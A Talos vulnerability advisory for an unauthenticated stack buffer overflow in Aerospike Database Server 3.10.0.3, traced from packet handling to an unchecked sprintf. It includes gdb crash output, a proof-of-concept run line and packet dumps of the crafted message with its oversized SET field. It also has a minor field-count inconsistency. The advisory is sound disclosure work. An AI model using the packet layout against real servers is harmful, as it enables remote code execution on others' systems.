Talos Vulnerability Report

TALOS-2016-0268

Aerospike Database Server Set Name Code Execution Vulnerability

January 9, 2017

CVE Number

CVE-2016-9054

Summary

An exploitable stack-based buffer overflow vulnerability exists in the querying functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause a stack-based buffer overflow in the function as_sindex__simatch_list_by_set_binid resulting in remote code execution. An attacker can simply connect to the port to trigger this vulnerability.

Tested Versions

Aerospike Database Server 3.10.0.3

Product URLs

https://github.com/aerospike/aerospike-server/tree/3.10.0.3

CVSSv3 Score

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

Details

Aerospike Database Server is a distributed, scalable NoSQL database that is used as a back-end for scalable web applications that need a key-value store. With a focus on performance, it is multi-threaded and retains its indexes entirely in RAM, with the ability to persist data to a solid-state drive or traditional rotational media.

When processing a packet from the client, the server executes the thr_demarshal function. After accepting a connection on the socket, the server reads the header from the packet and checks its protocol type. If the protocol type specifies that the packet is compressed (PROTO_TYPE_AS_MSG_COMPRESSED), the server decompresses it with zlib and then continues to process the packet [1]. Later, when the protocol type is PROTO_TYPE_AS_MSG, the server passes the packet to the thr_tsvc_process_or_enqueue function [2].

as/src/base/thr_demarshal.c:389
void *
thr_demarshal(void *unused)
{
...
    // Demarshal transactions from the socket.
...
        // Iterate over all events.
        for (i = 0; i < nevents; i++) {
...
                // If pointer is NULL, then we need to create a transaction and
                // store it in the buffer.
                if (fd_h->proto == NULL) {
...
                    // Do a preliminary read of the header into a stack-
                    // allocated structure, so that later on we can allocate the
                    // entire message buffer.
                    if (0 >= (n = cf_socket_recv(sock, &proto, sizeof(as_proto), MSG_WAITALL))) {
                        cf_detail(AS_DEMARSHAL, "proto socket: read header fail: error: rv %d sz was %d errno %d", n, sz, errno);
                        goto NextEvent_FD_Cleanup;
                    }
...
                // Check for a finished read.
                if (0 == fd_h->proto_unread) {
...
                    // Check if it's compressed.
                    if (tr.msgp->proto.type == PROTO_TYPE_AS_MSG_COMPRESSED) {      // [1]
...
                    }
...
                    // Either process the transaction directly in this thread,
                    // or queue it for processing by another thread (tsvc/info).
                    if (0 != thr_tsvc_process_or_enqueue(&tr)) {                    // [2]
                        cf_warning(AS_DEMARSHAL, "Failed to queue transaction to the service thread");
                        goto NextEvent_FD_Cleanup;
                    }

The thr_tsvc_process_or_enqueue function first reads the namespace from the packet and checks whether its data is configured to be stored in memory by calling the as_msg_peek_data_in_memory function [1]. As the condition in the excerpt shows, if inline transactions are allowed and that check passes (or every configured namespace is stored in memory), the function continues by calling directly into process_transaction [2]. In order to trigger this particular vulnerability, this is the path that must be taken.

as/src/base/thr_tsvc.c:497
int
thr_tsvc_process_or_enqueue(as_transaction *tr)
{
    // If transaction is for data-in-memory namespace, process in this thread.
    if (g_config.allow_inline_transactions &&
            g_config.n_namespaces_in_memory != 0 &&
                    (g_config.n_namespaces_not_in_memory == 0 ||
                            as_msg_peek_data_in_memory(&tr->msgp->msg))) {  // [1]
        process_transaction(tr);                                            // [2]
        return 0;
    }
...
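
The branch condition in the excerpt above can be restated as a small truth function. The following is only an illustrative Python model, not server code: the Config class and the processes_inline helper are hypothetical names, and only the three configuration fields that appear in the excerpt are modelled.

```python
from dataclasses import dataclass


@dataclass
class Config:
    # Hypothetical stand-in for the three g_config members used in the excerpt.
    allow_inline_transactions: bool
    n_namespaces_in_memory: int
    n_namespaces_not_in_memory: int


def processes_inline(cfg: Config, msg_namespace_in_memory: bool) -> bool:
    """Return True when the excerpt's condition would call process_transaction directly."""
    return bool(
        cfg.allow_inline_transactions
        and cfg.n_namespaces_in_memory != 0
        and (cfg.n_namespaces_not_in_memory == 0 or msg_namespace_in_memory)
    )
```

For example, with inline transactions allowed and only in-memory namespaces configured, the peek result is never consulted and the transaction is processed in the demarshal thread.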

Inside the process_transaction function, the server uses the string defined by the AS_MSG_FIELD_TYPE_NAMESPACE field to determine the namespace. Once the namespace is found, the server determines what type of transaction request is being made by checking which fields are defined. After determining that the transaction is a multi-record type by checking that the AS_MSG_FIELD_BIT_KEY and AS_MSG_FIELD_BIT_DIGEST_RIPE fields are not included [1], the server checks whether it is a batched transaction by testing whether AS_MSG_FIELD_BIT_DIGEST_RIPE_ARRAY is included [2]. Finally, after checking for those fields, the function calls as_transaction_is_query [3]. The as_transaction_is_query function checks whether the AS_MSG_FIELD_BIT_INDEX_RANGE field is set and, if so, execution passes to the as_query function at [4].

as/src/base/thr_tsvc.c:71
void
process_transaction(as_transaction *tr)
{
...
    // All transactions must have a namespace.
    as_msg_field *nf = as_msg_field_get(m, AS_MSG_FIELD_TYPE_NAMESPACE);
...
    as_namespace *ns = as_namespace_get_bymsgfield(nf);
...
    if (as_transaction_is_multi_record(tr)) {           // [1] \
...
        if (as_transaction_is_batch_direct(tr)) {       // [2] \
...
        }
        else if (as_transaction_is_query(tr)) {         // [3] \
            // Query.
...
            if (as_query(tr, ns) != 0) {                // [4]
...


\ [1]
as/include/base/transaction.h:265
static inline bool
as_transaction_is_multi_record(const as_transaction *tr)
{
    return	(tr->msg_fields & (AS_MSG_FIELD_BIT_KEY | AS_MSG_FIELD_BIT_DIGEST_RIPE)) == 0 &&
            (tr->from_flags & FROM_FLAG_BATCH_SUB) == 0;
}

\ [2]
as/include/base/transaction.h:272
static inline bool
as_transaction_is_batch_direct(const as_transaction *tr)
{
    // Assumes we're already multi-record.
    return (tr->msg_fields & AS_MSG_FIELD_BIT_DIGEST_RIPE_ARRAY) != 0;
}

\ [3]
as/include/base/transaction.h:265
static inline bool
as_transaction_is_query(const as_transaction *tr)
{
    // Assumes we're already multi-record.
    return (tr->msg_fields & AS_MSG_FIELD_BIT_INDEX_RANGE) != 0;
}
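
The three inline predicates above amount to a short decision chain over a bitmask. The Python sketch below models that chain for illustration only. The numeric bit positions are assumptions chosen for the example (the real values live in the server headers), and the classify function is a hypothetical helper, not part of Aerospike.

```python
# Assumed, illustrative bit assignments; the real constants are defined by the server.
BIT_KEY = 1 << 0
BIT_DIGEST_RIPE = 1 << 1
BIT_DIGEST_RIPE_ARRAY = 1 << 2
BIT_INDEX_RANGE = 1 << 3
FROM_FLAG_BATCH_SUB = 1 << 0


def classify(msg_fields: int, from_flags: int = 0) -> str:
    """Follow the same order of checks as process_transaction in the excerpt."""
    multi_record = (
        (msg_fields & (BIT_KEY | BIT_DIGEST_RIPE)) == 0
        and (from_flags & FROM_FLAG_BATCH_SUB) == 0
    )
    if not multi_record:
        return "single-record"
    if msg_fields & BIT_DIGEST_RIPE_ARRAY:
        return "batch-direct"
    if msg_fields & BIT_INDEX_RANGE:
        return "query"
    return "other multi-record"
```

A message that carries an index range but neither a key nor a digest is classified as a query, which is the branch that reaches as_query.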

At the beginning of the as_query function, the application hands off the transaction to the query_setup function [1]. Inside this function, the server checks whether the requested namespace has a secondary index associated with it by calling as_sindex_ns_has_sindex [2]. After this is determined, the range metadata for the index is fetched from the packet by as_sindex_rangep_from_msg. The server then reads a string out of the AS_MSG_FIELD_TYPE_SET field [3]. This string is saved to the setname variable and then passed as an argument to as_sindex_from_range [4].

as/src/base/thr_query.c:2856
int
as_query(as_transaction *tr, as_namespace *ns)
{
    if (tr) {
        QUERY_HIST_INSERT_DATA_POINT(query_txn_q_wait_hist, tr->start_time);
    }

    as_query_transaction *qtr;
    int rv = query_setup(tr, ns, &qtr);                                         // [1] \
...
\
as/src/base/thr_query.c:2686
static int
query_setup(as_transaction *tr, as_namespace *ns, as_query_transaction **qtrp)
{
...
    bool has_sindex   = as_sindex_ns_has_sindex(ns);                            // [2]
...
    int ret = as_sindex_rangep_from_msg(ns, &tr->msgp->msg, &srange);
...
    ASD_SINDEX_MSGRANGE_FINISHED(nodeid, trid);
    // get optional set
    as_msg_field *sfp = as_transaction_has_set(tr) ?
            as_msg_field_get(&tr->msgp->msg, AS_MSG_FIELD_TYPE_SET) : NULL;     // [3]
    if (sfp && as_msg_field_get_value_sz(sfp) > 0) {
        setname = cf_strndup((const char *)sfp->data, as_msg_field_get_value_sz(sfp));
    }
...
    } else {
        // Look up sindex by bin in the query in case not
        // specified in query
        si = as_sindex_from_range(ns, setname, srange);                         // [4]
    }

Inside the as_sindex_from_range function, the string from the packet is passed to the as_sindex_lookup_by_defns function [1], which is a wrapper around as_sindex__lookup_lockfree. Later in that function, the string is handed off to as_sindex__simatch_by_set_binid [2]. This function leads directly to the vulnerable code.

as/src/base/secondary_index.c:2520
as_sindex *
as_sindex_from_range(as_namespace *ns, char *set, as_sindex_range *srange)
{
...
    as_sindex *si = as_sindex_lookup_by_defns(ns, set, srange->start.id,            // [1] \\
                        as_sindex_sktype_from_pktype(srange->start.type), srange->itype, srange->bin_path,
                        AS_SINDEX_LOOKUP_FLAG_ISACTIVE);
\\
as_sindex *
as_sindex__lookup_lockfree(as_namespace *ns, char *iname, char *set, int binid,
                                as_sindex_ktype type, as_sindex_type itype, char * path, char flag)
{
...
	simatch   = as_sindex__simatch_by_set_binid(ns, set, binid, type, itype, path); // [2]
...

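Finally, the string is passed into as_sindex__simatch_list_by_set_binid [1] and then used as an argument to sprintf [2], which writes into the fixed-size stack buffer si_prop. If the length of the set name, together with the underscore separator, the decimal digits of the bin id, and the terminating null byte, is larger than AS_SINDEX_PROP_KEY_SIZE (84), the write runs past the end of the buffer and the vulnerability is triggered.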

as/src/base/secondary_index.c:122
#define AS_SINDEX_PROP_KEY_SIZE (AS_SET_NAME_MAX_SIZE + 20) // setname_binid_typeid

as/include/base/datamodel.h:1141
#define AS_SET_NAME_MAX_SIZE	64		// includes space for null-terminator

as/src/base/secondary_index.c:849
int
as_sindex__simatch_by_set_binid(as_namespace *ns, char * set, int binid, as_sindex_ktype type, as_sindex_type itype, char * path)
{
...
    cf_ll * simatch_ll = NULL;
    as_sindex__simatch_list_by_set_binid(ns, set, binid, &simatch_ll);      // [1]
...
\
as/src/base/secondary_index.c:815
as_sindex_status
as_sindex__simatch_list_by_set_binid(as_namespace * ns, const char *set, int binid, cf_ll ** simatch_ll)
{
    // Make the fixed size key (set_binid)
    // Look for the key in set_binid_hash
    // If found return the value (list of simatches)
    // Else return NULL

    // Make the fixed size key (set_binid)
    char si_prop[AS_SINDEX_PROP_KEY_SIZE];
    memset(si_prop, 0, AS_SINDEX_PROP_KEY_SIZE);
    if (!set) {
        sprintf(si_prop, "_%d", binid);
    }
    else {
        sprintf(si_prop, "%s_%d", set, binid);                              // [2]
    }
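
The size condition can be checked with simple arithmetic. The Python sketch below is an illustration rather than server code: it computes how many bytes the "%s_%d" format would need for a given set name and bin id and compares that with the 84-byte buffer. The two constants are taken from the excerpts above; the helper names are hypothetical.

```python
AS_SET_NAME_MAX_SIZE = 64                             # includes the null terminator
AS_SINDEX_PROP_KEY_SIZE = AS_SET_NAME_MAX_SIZE + 20   # 84, size of si_prop


def si_prop_bytes_needed(set_name: bytes, binid: int) -> int:
    """Bytes written by sprintf(si_prop, "%s_%d", set, binid), including the NUL."""
    # %s stops at the first NUL byte, so only the prefix before it counts.
    visible = set_name.split(b"\x00", 1)[0]
    return len(visible) + 1 + len(str(binid)) + 1


def overflows(set_name: bytes, binid: int) -> bool:
    """True when the formatted key would not fit in the fixed-size buffer."""
    return si_prop_bytes_needed(set_name, binid) > AS_SINDEX_PROP_KEY_SIZE
```

Under these assumptions, a set name within the documented limit (63 characters plus terminator) always fits, whereas a name of several hundred bytes, such as the one in the proof-of-concept, exceeds the buffer by a wide margin.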

Crash Information

# gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2`
...

(gdb) b as_sindex__simatch_by_iname
Breakpoint 5 at 0x506331: file base/secondary_index.c, line 985.

(gdb) c
Continuing.
[Switching to Thread 0x7f8d0cf77700 (LWP 43832)]

Catchpoint 4 (signal SIGSEGV), 0x0000000000505b41 in as_sindex__simatch_list_by_set_binid (ns=0x4141414141414141,
    set=0x4141414141414141 <Address 0x4141414141414141 out of bounds>,
    binid=0x41414141, simatch_ll=0x4141414141414141)
    at base/secondary_index.c:834
834             int rv             = shash_get(ns->sindex_set_binid_hash, (void *)si_prop, (void *)simatch_ll);

Exploit Proof-of-Concept

To execute the proof-of-concept (note: this is only provided to the vendor), simply extract and run it as follows:

$ python poc hostname:3000 $namespace $binid
Trying to connect to hostname:3000
Sending 0x232 byte packet... done.

A client packet for Aerospike server has the following structure. The first 2 bytes describe the protocol version and the protocol type. The version must be 0x02, and the protocol type can be one of two values. If AS_COMPRESSED_MSG(0x04) is specified, the contents of data are zlib-encoded. Otherwise, the AS_MSG(0x03) value is used. The size of the data is defined by the sz field, which is a 48-bit unsigned integer.

<class aspie.as_proto_s>
[0] <instance aspie.proto_version 'version'> v2(0x2)
[1] <instance aspie.proto_type 'type'> AS_MSG(0x3)
[2] <instance uint48_t 'sz'> +0x00000000022e (558)
[8] <instance aspie.as_msg_s 'data'> "\x00\x00\x00\x00\x00\x00\x00 ..skipped ~538 bytes.. \x42\x42\x42\x42\x42\x42\x42"

The contents of the data field have the following structure. In order to submit a message that passes the checks at as_transaction_is_multi_record and as_transaction_is_query, there simply needs to be a field with the NAMESPACE(0x0) id, one with an INDEX_RANGE(0x16) id, and no fields that use the BIT_KEY(2) or BIT_DIGEST_RIPE(4) identifiers. The field that is used for the overflow has the SET(0x1) id. This means that there must be at least three fields defined, and thus the uint16_t field n_fields must be set to 0x0003 or more.

<class aspie.as_msg_s> 'data'
[8] <instance uint8_t 'header_sz'> +0x00 (0)
[9] <instance aspie.AS_MSG_INFO1 'info1'> {bits=8} (0x00, 8)
[a] <instance aspie.AS_MSG_INFO2 'info2'> {bits=8} (0x00, 8)
[b] <instance aspie.AS_MSG_INFO3 'info3'> {bits=8} (0x00, 8)
[c] <instance uint8_t 'unused'> +0x00 (0)
[d] <instance uint8_t 'result_code'> +0x00 (0)
[e] <instance uint32_t 'generation'> +0x00000000 (0)
[12] <instance uint32_t 'record_ttl'> +0x00000000 (0)
[16] <instance uint32_t 'transaction_ttl'> +0x00000000 (0)
[1a] <instance uint16_t 'n_fields'> +0x0003 (3)
[1c] <instance uint16_t 'n_ops'> +0x0000 (0)
[1e] <instance array(aspie.as_msg_field_s,3) 'fields'> aspie.as_msg_field_s[3] "\x00\x00\x00\x09\x00\x58\x58 ..skipped ~516 bytes.. \x42\x42\x42\x42\x42\x42\x42"
[236] <instance array(aspie.as_msg_op_s,0) 'ops'> aspie.as_msg_op_s[0] ""
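
The fixed part of the message, from offset 0x8 up to the start of the fields array at 0x1e, is 22 bytes long. The Python sketch below decodes it with the struct module. It assumes big-endian integers, which is an inference from the dumps rather than something stated by the vendor, and the names AsMsgHeader and parse_as_msg_header are hypothetical.

```python
import struct
from collections import namedtuple

# Six single bytes, three 32-bit integers, two 16-bit integers: 22 bytes in total.
AS_MSG_HEADER = struct.Struct(">BBBBBBIIIHH")

AsMsgHeader = namedtuple(
    "AsMsgHeader",
    "header_sz info1 info2 info3 unused result_code "
    "generation record_ttl transaction_ttl n_fields n_ops",
)


def parse_as_msg_header(data: bytes) -> AsMsgHeader:
    """Decode the fixed-size header that precedes the fields array."""
    if len(data) < AS_MSG_HEADER.size:
        raise ValueError("message shorter than the fixed header")
    return AsMsgHeader(*AS_MSG_HEADER.unpack_from(data, 0))
```

The n_fields value returned here tells a parser how many variable-length field records follow the header.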

At offset 0x1e of the packet is the definition of fields. This is an array of fields that provide options for the type of request that is being made. The field identified by NAMESPACE(0x0) contains a namespace that supports the configuration defined above.

<class aspie.as_msg_field_s> '0'
[1e] <instance uint32_t 'field_sz'> +0xXXXXXXXX (X)
[22] <instance aspie.AS_MSG_FIELD_TYPE 'type'> NAMESPACE(0x0)
[23] <instance aspie.as_msg_namespace_s<char_t> 'data'> ...

One of the requirements is that an INDEX_RANGE(0x16) field must be defined. In the packet generated by the proof-of-concept, this field begins at offset 0x24, as shown in the dump below.

<class aspie.as_msg_field_s> '1'
[24] <instance be(pint.uint32_t) 'field_sz'> +0x0000001d (29)
[28] <instance be(aspie.AS_MSG_FIELD_TYPE) 'type'> INDEX_RANGE(0x16)
[29] <instance aspie.as_msg_index_range_s 'data'> "\x01\x01\x62\x01\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"

<class aspie.as_msg_index_range_s> 'data'
[29] <instance be(pint.uint8_t) 'numrange'> +0x01 (1)
[2a] <instance dynamic.array(aspie.irange,1) 'range'> aspie.irange[1] "\x01\x62\x01\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"

<class aspie.irange> '0'
[2a] <instance be(pint.uint8_t) 'bin_path_len'> +0x01 (1)
[2b] <instance c(pstr.string<char_t>) 'bin_path'> u'b'
[2c] <instance aspie.particle 'particle'> "\x01\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"

<class aspie.particle> 'particle'
[2c] <instance be(aspie.AS_PARTICLE_TYPE) 'type'> INTEGER(0x1)
[2d] <instance be(pint.uint32_t) 'start_particle_size'> +0x00000008 (8)
[31] <instance dynamic.block(8) 'start_particle_data'> "\x00\x00\x00\x00\x00\x00\x00\x00"
[39] <instance be(pint.uint32_t) 'end_particle_size'> +0x00000008 (8)
[3d] <instance dynamic.block(8) 'end_particle_data'> "\x00\x00\x00\x00\x00\x00\x00\x00"

Another requirement is that an INDEX_TYPE(0x1a) field must be defined.

<class aspie.as_msg_field_s> '3'
[24a] <instance be(pint.uint32_t) 'field_sz'> +0x00000001 (1)
[24e] <instance be(aspie.AS_MSG_FIELD_TYPE) 'type'> INDEX_TYPE(0x1a)
[24f] <instance c(be(aspie.as_msg_index_type_s)) 'data'> DEFAULT(0x0)

The last field, which is used to overflow the 84-byte buffer, has the identifier SET(0x1). As long as the length defined in field_sz is larger than 84 and the data contains the same number of bytes, this vulnerability is triggered.

<class aspie.as_msg_field_s> '2'
[45] <instance be(pint.uint32_t) 'field_sz'> +0x00000201 (513)
[49] <instance be(aspie.AS_MSG_FIELD_TYPE) 'type'> SET(0x1)
[4a] <instance c(c(ptype.block)) 'data'> "\x41\x41\x41\x41\x41\x41\x41 ..skipped ~492 bytes.. \x41\x41\x41\x41\x41\x41\x41"
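
From a defensive point of view, the field layout shown in these dumps makes it straightforward to spot an oversized set name before it reaches the lookup code. The Python sketch below walks a fields array and reports any SET(0x1) value that would not fit in AS_SET_NAME_MAX_SIZE. It assumes a big-endian field_sz that counts the type byte plus the value, which is inferred from the offsets in the dumps; iter_fields and oversized_set_names are hypothetical helpers, not Aerospike APIs.

```python
import struct

FIELD_TYPE_SET = 0x01
AS_SET_NAME_MAX_SIZE = 64  # includes the null terminator, so 63 usable bytes


def iter_fields(buf: bytes, n_fields: int):
    """Yield (type, value) for each field record in the fields array."""
    off = 0
    for _ in range(n_fields):
        if off + 5 > len(buf):
            raise ValueError("truncated field header")
        field_sz, ftype = struct.unpack_from(">IB", buf, off)
        # field_sz is assumed to cover the type byte plus the value bytes.
        if field_sz < 1 or off + 4 + field_sz > len(buf):
            raise ValueError("field size exceeds the buffer")
        yield ftype, buf[off + 5 : off + 4 + field_sz]
        off += 4 + field_sz


def oversized_set_names(buf: bytes, n_fields: int):
    """Return the SET values that are too long for a valid set name."""
    return [
        value
        for ftype, value in iter_fields(buf, n_fields)
        if ftype == FIELD_TYPE_SET and len(value) >= AS_SET_NAME_MAX_SIZE
    ]
```

A check of this kind, applied where the set name is first read from the message, would reject the request before the string is ever formatted into the fixed-size buffer.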

Timeline

2016-12-23 - Vendor Disclosure
2017-01-09 - Public Release

Credit

Discovered by the Cisco Talos Team.